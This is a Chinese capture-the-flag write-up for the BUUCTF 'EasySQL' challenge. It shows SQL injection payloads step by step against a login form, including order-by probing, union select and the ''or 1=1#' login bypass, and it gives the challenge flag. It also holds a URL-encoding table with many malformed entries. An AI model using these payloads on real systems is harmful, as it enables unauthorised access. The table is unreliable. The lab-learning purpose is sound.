BUUCTF-WEB：[极客大挑战 2019]EasySQL 1（收藏了URL编码表）

点击链接进入环境发现是一个登录界面
我的思路：
第一步、测试注入点（tips：利用单引号，and 1=1， or 1=1之类的，%23为#注释符的url编码）判断是字符型还是数字型

payload：username=1' &password=123（SQL tyntax）

payload：username=1' %23&password=123（说明存在注入点）

第二步、利用order by查表的列数

payload：username=1' order by 1%23&password=123（NO,Wrong username password！！！）
payload：username=1' order by 2%23&password=123（NO,Wrong username password！！！）
payload：username=1' order by 3%23&password=123（NO,Wrong username password！！！）
payload：username=1' order by 4%23&password=123（Unknown column '4' in 'order clause'）
说明表只有四列

第三步、如有回显，找到回显位（回显，就是显示正在执行的批处理命令及执行的结果等）

payload：username=1' union select 1,2,3%23&password=123

flag{cb71f2ab-7fea-42d9-bf34-41755337fada}
发现在查找回显位的这一步就出现了flag，都用不到爆库

第四步、利用union select 爆库、爆表、爆字段名、爆值

看大佬wp发现还有一种更简单的方法：

实际上这道题是登录成功就可以拿到flag
在用户名和密码都填：
payload:'or 1=1#
由于用户名和密码都存在sql注入漏洞，可以用'闭合前面的查询语句同时用or绕过判断

★URL编码表：

backspace	8%	A	41%	a	61%	§	%A7	Õ	%D5
tab	9%	B	42%	b	62%	«	%AB	Ö	%D6
linefeed	%0A	C	43%	c	63%	¬	%AC	Ø	%D8
creturn	%0D	D	44%	d	64%	¯	%AD	Ù	%D9
space	20%	E	45%	e	65%	º	%B0	Ú	%DA
!	21%	F	46%	f	66%	±	%B1	Û	%DB
"	22%	G	47%	g	67%	ª	%B2	Ü	%DC
#	23%	H	48%	h	68%	,	%B4	Ý	%DD
$	24%	I	49%	i	69%	µ	%B5	Þ	%DE
%	25%	J	%4A	j	%6A	»	%BB	ß	%DF
&	26%	K	%4B	k	%6B	¼	%BC	à	%E0
'	27%	L	%4C	l	%6C	½	%BD	á	%E1
(	28%	M	%4D	m	%6D	¿	%BF	â	%E2
)	29%	N	%4E	n	%6E	À	%C0	ã	%E3
*	%2A	O	%4F	o	%6F	Á	%C1	ä	%E4
+	%2B	P	50%	p	70%	Â	%C2	å	%E5
,	%2C	Q	51%	q	71%	Ã	%C3	æ	%E6
-	%2D	R	52%	r	72%	Ä	%C4	ç	%E7
.	%2E	S	53%	s	73%	Å	%C5	è	%E8
/	%2F	T	54%	t	74%	Æ	%C6	é	%E9
0	30%	U	55%	u	75%	Ç	%C7	ê	%EA
1	31%	V	56%	v	76%	È	%C8	ë	%EB
2	32%	W	57%	w	77%	É	%C9	ì	%EC
3	33%	X	58%	x	78%	Ê	%CA	í	%ED
4	34%	Y	59%	y	79%	Ë	%CB	î	%EE
5	35%	Z	%5A	z	%7A	Ì	%CC	ï	%EF
6	36%							ð	%F0
7	37%	?	%3F	{	%7B	Í	%CD	ñ	%F1
8	38%	@	40%	\|	%7C	Î	%CE	ò	%F2
9	39%	[	%5B	}	%7D	Ï	%CF	ó	%F3
:	%3A	\	%5C	~	%7E	Ð	%D0	ô	%F4
;	%3B	]	%5D	¢	%A2	Ñ	%D1	õ	%F5
<	%3C	^	%5E	£	%A3	Ò	%D2	ö	%F6
=	%3D	_	%5F	¥	%A5	Ó	%D3	÷	%F7
>	%3E	`	60%	\|	%A6	Ô	%D4	ø	%F8
								ù	%F9

BUUCTF-WEB：[极客大挑战 2019]EasySQL 1（收藏了URL编码表）相关推荐

BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号首先有点常识: 正常SQL语句这 ...
BUUCTF Web [极客大挑战 2019]EasySQL
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
BUUCTF Web [极客大挑战 2019]Havefun
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
[极客大挑战2019] EasySQL
[强网杯 2019]随便注这题是写给自己看的,记录一下自己sql注入的学习历程,看了别人的博客,总结了一下自己的知识查看大佬操作首先是涉及到的点,因为写过一次,这次是总结知识点 1.堆叠注入该题 ...
【BUUCTF】[极客大挑战 2019]RCE ME
源码 <?php error_reporting(0); if(isset($_GET['code'])){$code=$_GET['code'];if(strlen($code)>40) ...
[极客大挑战 2019]EasySQL
用户名密码,尝试万能密码. 'or 1=1 # 随便密码获得flag 一个万能密码的参考:万能密码
【BUUCTF】[极客大挑战 2019]Havefun 1
主要考察对源代码的理解 1.进入网站 2.发现网页并没有什么有用的提示,观察源代码发现可能有用的判别语句 3.尝试输入?cat=dog
BUUCTF：[极客大挑战 2019]RCE ME
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编 ...

BUUCTF-WEB：[极客大挑战 2019]EasySQL 1（收藏了URL编码表）

BUUCTF-WEB：[极客大挑战 2019]EasySQL 1（收藏了URL编码表）相关推荐

最新文章

热门文章